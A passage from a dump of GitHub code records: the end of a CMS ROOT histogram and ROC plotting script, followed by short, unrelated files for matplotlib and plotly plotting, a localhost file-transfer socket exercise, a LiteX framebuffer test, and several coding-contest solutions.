# color = 'blue'\n # ax2.set_ylabel('Signal Efficiency', color=color)\n # 
ax2.step(cutValues,seffs,color=color)\n # ax2.tick_params(axis='y',labelcolor=color)\n #\n # fig.tight_layout()\n # # for some reason, the x grid line is just not showing right, that's why we have the following code\n # for cut in np.arange(min(cutValues),max(cutValues),50):\n # plt.vlines(cut,0,max(seffs),color=\"silver\",linewidth=0.5)\n # plt.grid()\n # plt.savefig(outputPath + \"/FOMSEff_\" + histoName + \"_\" + slabel + \".png\")\n\n plt.close()\n\n\n\n\ndef plotROC(data, histoName, outputPath=\"./\", isLogY=False, xmin=999.9, xmax=-999.9, norm=False, manySigs=False, stList=None, allRocValues=None):\n #This is a magic incantation to disassociate opened histograms from their files so the files can be closed\n ROOT.TH1.AddDirectory(False)\n\n #create the canvas for the plot\n c1 = ROOT.TCanvas( \"c\", \"c\", 800, 800)\n\n c1.cd()\n\n ROOT.gPad.Clear()\n ROOT.gStyle.SetOptStat(\"\")\n ROOT.gPad.SetLeftMargin(0.15)\n ROOT.gPad.SetRightMargin(0.05)\n ROOT.gPad.SetTopMargin(0.08)\n ROOT.gPad.SetBottomMargin(0.12)\n ROOT.gPad.SetTicks(1,1)\n ROOT.gPad.SetLogy(isLogY)\n\n #Create TLegend\n leg = ROOT.TLegend(0.17, 0.72, 0.95, 0.88)\n #nColumns = 3 if(len(data[1]) >= 3) else 1\n nColumns = 2\n leg.SetFillStyle(0)\n leg.SetBorderSize(0)\n leg.SetLineWidth(1)\n leg.SetNColumns(nColumns)\n leg.SetTextFont(42)\n ROOT.gStyle.SetLegendTextSize(0.024)\n\n rocBgVec = []\n for d in data[1]:\n h = d.getHisto(histoName, rebinx=-1, xmin=xmin, xmax=xmax, fill=True, showEvents=False, overflow=False)\n rocBgVec.append(makeRocVec(h) + ( d.legEntry(), d.getColor()))\n\n rocSigVec = []\n for d in data[2]:\n h = d.getHisto(histoName, rebinx=-1, xmin=xmin, xmax=xmax, fill=True, showEvents=False, overflow=False)\n rocSigVec.append(makeRocVec(h) + (d.legEntry(), d.getColor()))\n\n #create a dummy histogram to act as the axes\n ymax=1.0\n ymin=10**-4\n lmax=1.0\n dummy = ROOT.TH1D(\"dummy\", \"dummy\", 1000, 0.0, 1.0)\n setupDummy(dummy, leg, \"\", \"#epsilon_{ bg}\", \"#epsilon_{ sg}\", isLogY, xmin, xmax, ymin, ymax, lmax)\n # print(\"ymax = \",ymax)\n dummy.Draw(\"hist\")\n leg.Draw(\"same\")\n print(histoName)\n history = drawRocCurve(\"\", rocBgVec, rocSigVec, leg, manySigs, stList, allRocValues)\n\n line1 = ROOT.TF1( \"line1\",\"1\",0,1)\n line1.SetLineColor(ROOT.kBlack)\n line1.Draw(\"same\")\n line2 = ROOT.TF1( \"line2\",\"x\",0,1)\n line2.SetLineColor(ROOT.kBlack)\n line2.SetLineStyle(ROOT.kDotted)\n line2.Draw(\"same\")\n\n dummy.Draw(\"AXIS same\")\n # dummy.GetXaxis().SetRangeUser(0,0.1)\n # dummy.SetMinimum(0.8)\n # dummy.SetMaximum(1.1)\n # CMS label\n CMS_lumi.writeExtraText = 1\n lumi = \"59.7\"\n\n CMS_lumi.lumi_sqrtS = lumi + \" fb^{-1} (13 TeV)\"\n\n iPeriod = 0\n iPos = 0\n\n CMS_lumi.CMS_lumi(c1, iPeriod, iPos)\n c1.cd()\n c1.Update();\n c1.RedrawAxis()\n\n c1.SaveAs(outputPath+\"/\"+histoName+\"_ROC.png\")\n c1.Close()\n del c1\n del leg\n\ndef createRatio(h1, h2, xtitle):\n h3 = h1.Clone(\"h3\"+xtitle)\n h3.SetLineColor(ROOT.kBlack)\n h3.SetMarkerStyle(20)\n h3.SetMarkerSize(1)\n h3.SetMarkerColor(ROOT.kBlack)\n h3.SetTitle(\"\")\n \n h3.SetMinimum(0)\n h3.SetMaximum(2)\n\t# Set up plot for markers and errors\n\t#h3.Sumw2()\n h3.SetStats(0)\n h3.Divide(h2)\n # ymax = h3.GetMaximumBin()\n # print(\"ymax in create Ratio = \",ymax)\n # h3.SetMaximum(ymax)\n\t# Adjust y-axis settings\n x = h3.GetXaxis()\n y = h3.GetYaxis()\n \n x.SetTitleOffset(0.65)\n y.SetTitleOffset(0.27)\n x.SetTitleSize(0.2)\n y.SetTitleSize(0.15)\n x.SetLabelSize(0.13)\n y.SetLabelSize(0.13)\n x.SetTitle(xtitle)\n # 
print(\"xtitle\",xtitle)\n y.SetTitle(\"Data/MC\")\n\n if(x.GetNdivisions() % 100 > 5): x.SetNdivisions(6, 5, 0)\n\n y.SetNdivisions(505)\n\n # y.SetTitleFont(43)\n \n # y.SetLabelFont(43)\n \n # x.SetTitleFont(43)\n # x.SetLabelFont(43)\n # x.SetLabelOffset(0.05)\n\n return h3\n\ndef createCanvasPads(c,isLogY):\n\t# Upper histogram plot is pad1\n # eps = 0.005\n pad1 = ROOT.TPad(\"pad1\", \"pad1\", 0, 0.3, 1.0, 0.97)\n pad1.SetBottomMargin(0.01) # joins upper and lower plot\n pad1.SetLeftMargin(0.10)\n pad1.SetRightMargin(0.05)\n pad1.SetTopMargin(0.1)\n # pad1.SetBottomMargin(0.12)\n pad1.SetTicks(1,1)\n pad1.SetLogy(isLogY)\n pad1.Draw()\n # Lower ratio plot is pad2\n c.cd() # returns to main canvas before defining pad2\n pad2 = ROOT.TPad(\"pad2\", \"pad2\", 0, 0.0, 1.0, 0.3)\n pad2.SetTopMargin(0) # joins upper and lower plot\n # pad2.SetBottomMargin(0.3)\n pad2.SetLeftMargin(0.10)\n pad2.SetRightMargin(0.05)\n # pad2.SetTopMargin(0.08)\n pad2.SetBottomMargin(0.35)\n pad2.SetTicks(1,1)\n pad2.SetGrid()\n pad2.Draw()\n\n return c, pad1, pad2\n\n\ndef plotStack(data, histoName, totalBin, outputPath=\"./\", xTitle=\"\", yTitle=\"\", isLogY=False, xmin=999.9, xmax=-999.9, norm=False, normBkg=False, onlySig=False, stList=None, yieldValues=None, isRatio=False):\n #This is a magic incantation to disassociate opened histograms from their files so the files can be closed\n ROOT.TH1.AddDirectory(False)\n # print(\"Data in plot stack = \",data)\n #create the canvas for the plot\n \n \n if isRatio:\n c1 = ROOT.TCanvas( \"c\", \"c\", 800, 700)\n c1, pad1, pad2 = createCanvasPads(c1,isLogY)\n pad1.cd()\n else:\n c1 = ROOT.TCanvas( \"c\", \"c\", 800, 800)\n c1.cd()\n ROOT.gPad.Clear()\n ROOT.gPad.SetLeftMargin(0.15)\n ROOT.gPad.SetRightMargin(0.05)\n ROOT.gPad.SetTopMargin(0.08)\n ROOT.gPad.SetBottomMargin(0.12)\n ROOT.gPad.SetTicks(1,1)\n ROOT.gPad.SetLogy(isLogY)\n \n ROOT.gStyle.SetOptStat(\"\")\n\n #Create TLegend\n leg = ROOT.TLegend(0.17, 0.7, 0.95, 0.88)\n #nColumns = 3 if(len(data[1]) >= 3) else 1\n nColumns = 2\n leg.SetFillStyle(0)\n leg.SetBorderSize(0)\n leg.SetLineWidth(1)\n leg.SetNColumns(nColumns)\n leg.SetTextFont(42)\n if isRatio:\n ROOT.gStyle.SetLegendTextSize(0.05)\n else: \n ROOT.gStyle.SetLegendTextSize(0.024)\n \n #Setup background histos\n rebinx = rebinCalc(totalBin,40)\n # print(\"rebinx = \",rebinx)\n hs = ROOT.THStack()\n hMC = None\n firstPass = True\n bkghist = None\n history = []\n \n # setup background histos\n # print(\"before setup bkg histos detail key = {}, {}, {}\".format(histoName,xmin, xmax))\n for d in data[1]:\n h = d.getHisto(histoName, rebinx=rebinx, xmin=xmin, xmax=xmax, fill=True, showEvents=True)\n if (stList != None) and (not normBkg):\n newEntry = stList + [getLabel(d.legEntry()),round(h.Integral())]\n yieldValues.loc[len(yieldValues.index)] = newEntry\n # print(newEntry)\n if normBkg:\n normHisto(h, True)\n h.SetLineWidth(3)\n h.SetFillStyle(3955) \n hs.Add(copy.deepcopy(h))\n leg.AddEntry(h, d.legEntry(), \"F\")\n # bkghist += h\n if(firstPass):\n hMC = copy.deepcopy(h)\n bkghist = h\n firstPass = False\n else:\n hMC.Add(copy.deepcopy(h))\n bkghist.Add(h)\n\n \n\n print(\"hs = \", hs)\n print(\"hMC = \",hMC)\n # there is a bug with getBGHistos. 
Once fixed, can delete lines 294-305, and uncomment\n # the line below and lines 313-314\n # hs, hMC, hList = getBGHistos(data, histoName, rebinx, xmin, xmax)\n if norm:\n normHisto(hMC, True)\n #Fill background legend\n # for h in hList:\n # leg.AddEntry(h[0], h[1], \"F\")\n\n #create a dummy histogram to act as the axes\n if norm:\n ymax=10**1\n ymin=10**-12\n lmax=10**1\n else:\n ymax=10**11\n ymin=10**-4\n lmax=10**12\n dummy = ROOT.TH1D(\"dummy\", \"dummy\", 1000, hMC.GetBinLowEdge(1), hMC.GetBinLowEdge(hMC.GetNbinsX()) + hMC.GetBinWidth(hMC.GetNbinsX()))\n setupDummy(dummy, leg, \"\", xTitle, yTitle, isLogY, xmin, xmax, ymin, ymax, lmax, norm, normBkg,isRatio)\n # print(\"near setup dummy detail key = {}, {}, {}\".format(histoName,xmin, xmax))\n \n # setupDummy(dummy, leg, histoName, xTitle, yTitle, isLogY, xmin, xmax, ymin, ymax, lmax, norm, normBkg)\n if normBkg:\n dummy.SetMaximum(100)\n dummy.SetMinimum(0.00001)\n dummy.Draw(\"hist\")\n if norm:\n hMC.Draw(\"hist same\")\n leg.Clear()\n leg.AddEntry(hMC, \"Total Background\", \"L\")\n elif normBkg:\n hs.Draw(\"nostackHIST same\")\n hs.SetMaximum(100)\n hs.SetMinimum(0.00001)\n elif onlySig:\n leg.Clear()\n else:\n hs.Draw(\"hist F same\")\n leg.Draw(\"same\")\n\n # print(\"detail key = {}, {}, {}\".format(histoName,xmin, xmax))\n \n #Setup signal histos\n \n sig = 0.0\n linestylenumber = 0\n linestyle = [ROOT.kSolid,ROOT.kDashed,ROOT.kDotted]\n if(data[2]):\n #firstPass=True\n for d in data[2]:\n h = d.getHisto(histoName, rebinx=rebinx, xmin=xmin, xmax=xmax, showEvents=True)\n if (stList != None) and (not normBkg):\n newEntry = stList + [getLabel(d.legEntry()),round(h.Integral())]\n yieldValues.loc[len(yieldValues.index)] = newEntry\n # print(\"Signal = \",newEntry)\n #if(firstPass):\n sig = round(simpleSig(h, hMC),2)\n #firstPass=False\n #print(d.legEntry(), round(simpleSig(h, hMC),2))\n # h.SetLineStyle(ROOT.kDashed)\n h.SetLineStyle(linestyle[linestylenumber%3] )\n linestylenumber+=1\n h.SetLineWidth(3)\n leg.AddEntry(h, d.legEntry()+\", {}\".format(sig), \"L\")\n if norm or normBkg:\n normHisto(h, True)\n h.Draw(\"hist same\")\n history.append(h)\n \n # Setup data histogram\n if(data[0]):\n for d in data[0]:\n datahist = d.getHisto(histoName, rebinx=rebinx,xmin=xmin,xmax=xmax,showEvents=True)\n if (stList != None) and (not normBkg):\n newEntry = stList + [getLabel(d.legEntry()),round(datahist.Integral())] # For the yield value calculation\n yieldValues.loc[len(yieldValues.index)] = newEntry\n # print(\"Data = \",newEntry)\n #firstPass=False\n ROOT.gStyle.SetErrorX(0.)\n datahist.SetMarkerStyle(20)\n datahist.SetMarkerSize(1)\n datahist.SetLineColor(ROOT.kBlack)\n leg.AddEntry(datahist, d.legEntry(), \"P\")\n # if norm or normBkg:\n # normHisto(datahist, True)\n datahist.Draw(\"P same\")\n dhist = datahist\n history.append(datahist)\n # Print ratio plot\n if isRatio:\n pad2.cd()\n # print(\"bkghist = \",bkghist)\n # setupAxes(dummy, 1.2, 1.6, 0.045, 0.045, 0.045, 0.045)\n ratio = createRatio(datahist,bkghist,xTitle)\n ratio.Draw(\"EX0P\")\n\n\n\n \n\n #Draw significance\n significance = ROOT.TLatex()\n significance.SetNDC(True)\n significance.SetTextAlign(11)\n significance.SetTextFont(52)\n significance.SetTextSize(0.030)\n #significance.DrawLatex(0.45, 0.72, (\"Significance = #frac{N_{s}}{#sqrt{N_{b}+#left(0.3N_{b}#right)^{2}}} = \"+str(sig)))\n #significance.DrawLatex(0.45, 0.72, (\"Significance = #frac{N_{s}}{#sqrt{N_{b}+#left(0.3N_{b}#right)^{2}}}\"))\n\n if onlySig:\n dummy.SetMaximum(10**8)\n dummy.Draw(\"AXIS 
same\")\n\n # ran = [870, 2385.0]\n # vl = ROOT.TLine(ran[0],0,ran[0],10**6)\n # vl.SetLineWidth(2)\n # vl.SetLineColor(ROOT.kRed)\n # vl.Draw(\"same\")\n # vl2 = ROOT.TLine(ran[1],0,ran[1],10**6)\n # vl2.SetLineWidth(2)\n # vl2.SetLineColor(ROOT.kRed)\n # vl2.Draw(\"same\")\n # CMS label\n CMS_lumi.writeExtraText = 1\n lumi = \"59.7\"\n\n CMS_lumi.lumi_sqrtS = lumi + \" fb^{-1} (13 TeV)\"\n\n iPeriod = 0\n iPos = 0\n\n CMS_lumi.CMS_lumi(c1, iPeriod, iPos)\n c1.cd()\n c1.Update();\n c1.RedrawAxis()\n\n if norm:\n c1.SaveAs(outputPath+\"/\"+histoName+\"_norm.png\")\n elif normBkg:\n c1.SaveAs(outputPath+\"/\"+histoName+\"_normBkg.png\")\n else:\n c1.SaveAs(outputPath+\"/\"+histoName+\".png\")\n\n c1.Close()\n del c1\n del leg\n del hMC\n\ndef main():\n parser = optparse.OptionParser(\"usage: %prog [options]\\n\")\n parser.add_option('-b', dest='isNormBkg', action=\"store_true\", help=\"Normalized Background and Signal plots\")\n parser.add_option('-d', '--dataset', dest='dataset', default='testHadd_11242020', help='dataset')\n parser.add_option('-j', '--jNVar', help='make histograms for nth jet variables', dest='jNVar', default=False, action='store_true')\n parser.add_option('-m', dest='manySigs', action=\"store_true\", help=\"Plot ROC curves with many signals vs. QCD\")\n parser.add_option('-n', dest='isNorm', action=\"store_true\", help=\"Normalize stack plots\")\n parser.add_option('-s', dest='onlySig', action=\"store_true\", help=\"Plot only signals\")\n parser.add_option('-y', dest='year', type='string', default='2018', help=\"Can pass in the run year\")\n parser.add_option('-o', dest='outputdir', type='string', help=\"Output folder name\")\n # parser.add_optio\n options, args = parser.parse_args()\n\n year = options.year\n # cuts = [\"\", \"_ge2AK8j\", \"_ge2AK8j_lp6METrST\", \"_ge2AK8j_l1p5dEta12\", \"_baseline\"]\n #cuts = [\"_ge2AK8j\"]\n # cutsImportant = [\"_qual_trg_st\",\"_qual_trg_st_0nim\",\"_qual_trg_st_ge1nim\"]\n # cutsImportant = [\"\",\"_2PJ\",\"_2PJ_nl\",\"_qual_trg_2PJ\", \"_qual_trg_st_2PJ\"]\n # cutsImportant = [\"\",\"_2PJ\",\"_2PJ_nl\",\"_qual_trg_2PJ\",\"_qual_trg_st_2PJ\",\"_qual_trg_st_ht_2PJ_dphimin\"]\n # cutsImportant = [\"_cr\"]\n # cutsImportant = [\"issue_ht\",\"_issue_met\"]\n cutsImportant = [\"_cr_muon\",\"_cr_electron\"]\n \n\n\n Data, sgData, bgData = getData(\"condor/\" + options.dataset + \"/\", 1.0, year)\n \n # print(sgData)\n #Data, sgData, bgData = getData(\"condor/MakeNJetsDists_\"+year+\"/\", 1.0, year)\n allRocValues = pd.DataFrame(columns=[\"cut\",\"var\",\"sig\",\"bkg\",\"roc_auc\",\"cutDir\",\"cutSig\",\"cBg\",\"cSig\",\"mBg_f\",\"mSig_f\"])\n yieldValues = pd.DataFrame(columns=[\"cut\",\"var\",\"source\",\"yield\"])\n signifValues = pd.DataFrame(columns=[\"cut\",\"var\",\"source\",\"max signif.\"])\n if options.outputdir:\n plotOutDir = \"output/{}\".format(options.outputdir)\n else: \n plotOutDir = \"output/{}\".format(options.dataset)\n\n preVars = {\n \"h_njets\":False,\n \"h_njetsAK8\":False,\n \"h_nb\":False,\n \"h_ht\":False,\n \"h_st\":False,\n \"h_met\":False,\n # \"h_mT\":True,\n # \"h_METrHT_pt30\":False,\n # \"h_METrST_pt30\":False,\n # \"h_dEtaj12AK8\":True,\n # \"h_dRJ12AK8\":True,\n # \"h_dPhij1METAK8\":False,\n # \"h_dPhij2METAK8\":False,\n # \"h_dPhij1rdPhij2AK8\":False,\n # \"h_dPhiMinjMETAK8\":False,\n # \"h_dEtaj12\":True,\n # \"h_dRJ12\":True,\n # \"h_dPhij1MET\":False,\n # \"h_dPhij2MET\":False,\n # \"h_dPhij1rdPhij2\":True,\n # \"h_dPhiMinjMET\":True,\n # \"h_mT2_f4_msm\":False,\n # \"h_mT2_f4_msm_dEta\":False,\n # 
\"h_mT2_f4_msm_dPhi\":False,\n # \"h_mT2_f4_msm_dR\":False,\n }\n varsSkip = [\n \"eCounter\",\n \"evtw\",\n \"jw\",\n \"fjw\"\n ]\n\n# myvars = key : [\"xlabel\", no. of bins, xmin,xmax, npzinfo, flattenInfo, weightName]\n \n for histName,details in vars(options.jNVar).items():\n # for histName, details in myVars.items():\n # print(histName)\n # print(details)\n isNorm = options.isNorm\n isNormBkg = options.isNormBkg\n onlySig = options.onlySig\n manySigs = options.manySigs\n if histName in varsSkip:\n continue\n #if details[6] != \"evtw\":\n # continue\n for cut in cutsImportant:\n makeDirs(plotOutDir,cut,\"Stacked\")\n makeDirs(plotOutDir,cut,\"roc\")\n makeDirs(plotOutDir,cut,\"FOM\")\n makeDirs(plotOutDir,cut,\"NormedStacked\")\n stList = [cut,histName]\n # print(\"Data = \",Data)\n # plotROC( (Data, bgData, sgData), \"h_\"+histName+cut, plotOutDir+\"/roc/\"+cut[1:], isLogY=False, manySigs=manySigs, stList=stList, allRocValues=allRocValues)\n # plotStack((Data, bgData, sgData), \"h_\"+histName+cut, details[1], plotOutDir+\"/Stacked/\"+cut[1:], details[0], \"Events\", isLogY=True, norm=isNorm, xmin=details[2], xmax=details[3], normBkg=False, onlySig=onlySig, stList=stList, yieldValues=yieldValues,isRatio=False)\n plotStack((Data, bgData, sgData), \"h_\"+histName+cut, details[1], plotOutDir+\"/Stacked/\"+cut[1:], details[0], \"Events\", isLogY=True,norm=isNorm, xmin=details[2], xmax=details[3], normBkg=False, onlySig=onlySig, stList=stList, yieldValues=yieldValues,isRatio=True)\n # plotStack((Data, bgData, sgData), \"h_\"+histName+cut, details[1], plotOutDir+\"/NormedStacked/\"+cut[1:], details[0], \"Events\", isLogY=True, norm=isNorm, xmin=details[2], xmax=details[3], normBkg=True, onlySig=onlySig, stList=stList, yieldValues=yieldValues)\n if histName in preVars.keys():\n plotSignificance((Data, bgData, sgData), \"h_\"+histName, details[1], details[0], plotOutDir, cut, isLogY=False, reverseCut=preVars[histName], signifValues=signifValues)\n yieldValues.to_csv(\"{}/yieldValues.csv\".format(plotOutDir))\n signifValues.to_csv(\"{}/signifValues.csv\".format(plotOutDir))\n allRocValues.to_csv(\"{}/allRocValues.csv\".format(plotOutDir))\n # print(yieldValues)\n\nif __name__ == '__main__':\n main()\n","repo_name":"alpana-hep/t-channel_Analysis","sub_path":"plotStack.py","file_name":"plotStack.py","file_ext":"py","file_size_in_byte":42091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"28972944691","text":"import matplotlib.pyplot as plt \nimport numpy as np \nimport math \n\nplt.style.use('seaborn-whitegrid')\nfont = {'size' : 17}\n\nplt.rc('font', **font)\n\n\nx = np.linspace(-10, 10, 100) \n# Sigmoid function\nsigmoid = 1/(1 + np.exp(-x))\n# Divergence of Sigmoid function\ndiv_sigmoid = np.exp(-x)/np.power(1 + np.exp(-x),2)\n \n# Tanh function\ntanh = 2/(1+np.exp(-2*x)) - 1\n# Divergence of tanh function\ndiv_tanh = 4*np.exp(-2*x)/np.power(1 + np.exp(-2*x),2)\n\n# RelU function\nrelu = np.maximum(0,x)\n# Divergence of ReLU function\ndiv_relu = np.sign(x)/2+0.5\n\nx_point = np.linspace(-10,10,5)\n# y expected\ny = np.array((1,2,3,4,5))\n# y predicted\ny_predicted = np.array((3,7,4,1,5))\n# loss values\nj = 0.5*np.power(y-y_predicted,2)\n\nlabels = [\"Wearing a hardhat\", \"Not wearing a hardhat\", \"Wearing a safety vest\", \"Not wearing a safety vest\", \"Wearing a mask\", \"Not wearing a mask\"]\nm_3_precision = [0.7297297297297297, 0.8783783783783784, 0.9324324324324325, 0.7432432432432432, 0.8175675675675675, 
0.3716216216216216]\nm_3_recall = [0.8558558558558558, 0.6621621621621622, 0.8513513513513513, 0.7162162162162162, 0.47747747747747743, 0.6486486486486487]\nx_pos = np.arange(len(labels))\n# plt.plot(x, sigmoid, 'r', label = \"Sigmoid(x)\")\n# plt.plot(x, div_sigmoid, 'b', label = \"Derivative of Sigmoid(x)\")\n# plt.title('Plot of the Sigmoid function and its derivative')\n# plt.plot(x, tanh, 'r', label = \"Tanh(x)\")\n# plt.plot(x, div_tanh, 'b', label = \"Derivative of Tanh(x)\")\n# plt.title('Plot of the Tanh function and its derivative')\n# plt.plot(x, relu, 'r', label = \"ReLU(x)\")\n# plt.plot(x, div_relu, 'b', label = \"Derivative of ReLU(x)\")\n# plt.title('Plot of the ReLU function and its derivative')\nplt.plot(x_pos, m_3_precision, '-or', label = \"Expected\")\nplt.xlabel(\"x\")\nplt.legend()\nplt.show() ","repo_name":"Sunfl4wer/graduation_thesis","sub_path":"plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1824,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"39846365908","text":"import socket\nimport time\nIP='localhost'\nPORT=80\nADDR=(IP,PORT)\nfile_name=\"my_file.txt\"\ndef main():\n    client=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n    client.connect(ADDR)\n    file=open(\"client_data/\"+file_name ,\"r\") #read particular file we need to send\n    data=file.read() \n    time.sleep(1) \n    client.send(file_name.encode('utf-8')) #send name of the file to server\n    print(\"[CLIENT] : filename is sent\")\n    time.sleep(1) \n    msg=client.recv(1024).decode('utf-8')\n    print(msg)\n    time.sleep(1) \n    client.send(data.encode('utf-8'))\n    print(\"[CLIENT] : file data sent\")\n    msg=client.recv(1024).decode('utf-8')\n    time.sleep(1) \n    print(msg)\n    time.sleep(2)\n    client.close()\n    \nif __name__==\"__main__\":\n    main()","repo_name":"arpan-svci/BCSE-III-CN-Assignments","sub_path":"computer_networks_7/ftp/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"26162645200","text":"def main():\n    N,X = map(int,input().split())\n    dp = [[] for _ in range(N+1)]\n    \n    dp[0].append(0)\n    \n    for i in range(1,N+1):\n        a, b = map(int,input().split())\n        for j in range(len(dp[i-1])):\n            if dp[i-1][j]+a <= X:\n                dp[i].append(dp[i-1][j]+a)\n            if dp[i-1][j]+b <= X:\n                dp[i].append(dp[i-1][j]+b)\n        dp[i] = list(set(dp[i]))\n        if X in dp[i]:\n            print(\"Yes\")\n            exit()\n\n    print(\"No\")\n\nif __name__ == '__main__':\n    main()","repo_name":"KK56ken/Competitive_professional","sub_path":"AtCoder/python/ABC_240/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"41105019538","text":"import time\nimport sys\nimport argparse\n\nfrom PIL import Image\n\nfrom litex import RemoteClient\n\n# Framebuffer Test ---------------------------------------------------------------------------------\n\ndef framebuffer_test(port):\n    bus = RemoteClient(port=port)\n    bus.open()\n\n    image = Image.open(\"glscopeclient_demo.png\")\n    pixels = image.load()\n\n    for y in range(480):\n        for x in range(0, 800, 8):\n            data = []\n            for i in range(8):\n                r, g, b = pixels[x + i, y]\n                data.append((r << 16) | (g << 8) | (b << 0))\n            bus.write(0x40c00000 + (y*800 + x)*4, data)\n\n    bus.close()\n\n
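# (added note, not in the original) framebuffer_test streams an 800x480 image:\n# each pixel is packed as 32-bit xRGB, so pixel (x, y) lands at\n# 0x40c00000 + (y*800 + x)*4; writes are batched eight pixels at a time over\n# the LiteX RemoteClient bridge.\n\n# Run ----------------------------------------------------------------------------------------------\n\ndef main():\n    parser = 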
argparse.ArgumentParser(description=\"Framebuffer test utility\")\n parser.add_argument(\"--port\", default=\"1234\", help=\"Host bind port\")\n args = parser.parse_args()\n\n port = int(args.port, 0)\n\n framebuffer_test(port=port)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"360nosc0pe/scope","sub_path":"test/test_framebuffer.py","file_name":"test_framebuffer.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"48"} +{"seq_id":"24700608823","text":"\"\"\"CSC110 Fall 2020: Final Project (plot.py)\r\n \r\nPlotting line graphs for correlation between donations\r\nfrom fossil fuel companies to politicians and GHG emissions.\r\nThis was used for analysis alongside the graphing in Graph.py\r\n\"\"\"\r\n\r\nimport data\r\nimport plotly.graph_objects as go\r\nfrom typing import Tuple\r\n\r\n\r\ndef simple_linear_regression(list_x: list, list_y: list) -> Tuple[float, float]:\r\n \"\"\"Perform a linear regression on the given points.\r\n \r\n list_x is a list of x-coordinates and list_y is the list of corresponding y-coordinates.\r\n This function returns a pair of floats (a, b) such that the line\r\n y = a + bx is the approximation of this data.\r\n \r\n Preconditions:\r\n - len(list_x) > 0\r\n - len(list_y) > 0\r\n \"\"\"\r\n x_avg = find_average(list_x)\r\n y_avg = find_average(list_y)\r\n length = len(list_x)\r\n \r\n b_numerator = sum([(list_x[i] - x_avg) * (list_y[i] - y_avg) for i in range(0, length)])\r\n b_denominator = sum([(x - x_avg) ** 2 for x in list_x])\r\n b = b_numerator / b_denominator\r\n a = y_avg - b * x_avg\r\n return (a, b)\r\n\r\n\r\ndef find_average(nums: list) -> float:\r\n \"\"\"Return the average of a list of numbers.\r\n \"\"\"\r\n return sum(nums) / max(len(nums), 1)\r\n\r\n\r\ndef plot(years: list, list_x: list, list_y: list, a: float, b: float, country: str) -> None:\r\n \"\"\"\r\n Plot the given x- and y-coordinates and linear regression model using plotly.\r\n \"\"\"\r\n fig = go.Figure(data=go.Scatter(x=list_x, y=list_y, mode='markers',\r\n name='Year', text=years))\r\n \r\n fig.add_trace(go.Scatter(x=[0, max(list_x)], y=[a, a + b * max(list_x)],\r\n mode='lines', name='Regression line'))\r\n \r\n title = ': Effect of donations from fossil fuel companies ' \\\r\n 'to politicians on annual GHG emissions'\r\n fig.update_layout(title=country + title,\r\n xaxis_title='Donations ($)',\r\n yaxis_title='Total GHG Emissions (megatonnes of CO2 equivalent)')\r\n \r\n fig.show()\r\n\r\ndef showPlots() -> None:\r\n \"\"\"Show scatter plots for the datasets\"\"\"\r\n \r\n print('Importing data...')\r\n usa_data = data.UsaData()\r\n canada_data = data.CanadaData()\r\n print('Done')\r\n \r\n # get data from USA\r\n usa_years = usa_data.get_year()\r\n usa_donations = usa_data.get_donation()[1:]\r\n usa_emissions = usa_data.get_emission()[:-1]\r\n \r\n # get data from Canada\r\n canada_years = canada_data.get_year()\r\n canada_donations = canada_data.get_donation()\r\n print(canada_donations)\r\n canada_emissions = canada_data.get_emission()\r\n \r\n # plot graphs\r\n a_usa, b_usa = simple_linear_regression(usa_donations, usa_emissions)\r\n plot(usa_years, usa_donations, usa_emissions, a_usa, b_usa, 'USA')\r\n \r\n a_canada, b_canada = simple_linear_regression(canada_donations, canada_emissions)\r\n plot(canada_years, canada_donations, canada_emissions, a_canada, b_canada, 'Canada')\r\n\r\n print('Donations from USA: ' + str(usa_donations))\r\n print('Emissions from USA: ' + 
str(usa_emissions) + '\\n')\r\n    print('Donations from Canada: ' + str(canada_donations))\r\n    print('Emissions from Canada: ' + str(canada_emissions))\r\n\r\nif __name__ == \"__main__\":\r\n    showPlots()\r\n","repo_name":"Danx1129/CSC110_Project","sub_path":"CSC110 Project/Plot.py","file_name":"Plot.py","file_ext":"py","file_size_in_byte":3274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"32661284389","text":"# Only test case 12 fails\ndef solution(number, k):\n    answer = \"\"\n    stack = []\n\n    stack.append(number[0])\n    for i in range(1, len(number)) :\n        \n        while stack and stack[-1] < number[i] :\n            if k > 0 :\n                stack.pop()\n                k -= 1\n            else :\n                break\n        \n        stack.append(number[i])\n\n    # print(stack)\n    answer = ''.join(stack)\n    return answer\n\nnumber = \"1\"\nk = 1\nsolution(number, k)\n# -------------------------------------------------------------------------\n\ndef solution(number, k):\n    answer = \"\"\n    stack = []\n\n    stack.append(number[0])\n    for i in range(1, len(number)) :\n        \n        while stack and stack[-1] < number[i] and k > 0:\n            stack.pop()\n            k -= 1\n\n        stack.append(number[i])\n\n    print(stack)\n    answer = ''.join(stack)\n    return answer\n\nnumber = \"1\"\nk = 1\nsolution(number, k)\n# Reference : https://train-validation-test.tistory.com/entry/%ED%94%84%EB%A1%9C%EA%B7%B8%EB%9E%98%EB%A8%B8%EC%8A%A4-level-2-%ED%81%B0-%EC%88%98-%EB%A7%8C%EB%93%A4%EA%B8%B0-%ED%8C%8C%EC%9D%B4%EC%8D%AC\n\n# ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n\n# 210119 accepted solution\ndef solution(number, k) :\n    box = []\n    for i in number :\n        while box and box[-1] < i and k > 0 :\n            k -= 1\n            del box[-1]\n        box.append(i)\n    \n    if k != 0 :\n        box = box[:-k]\n\n    print(box)\n    return ''.join(box)\n\nnumber = \"1\"\nk = 1\nsolution(number, k)\n\n\n\n","repo_name":"KimHyungkeun/Algorithm","sub_path":"SWcodingTest/2day/큰수만들기Retry.py","file_name":"큰수만들기Retry.py","file_ext":"py","file_size_in_byte":1637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
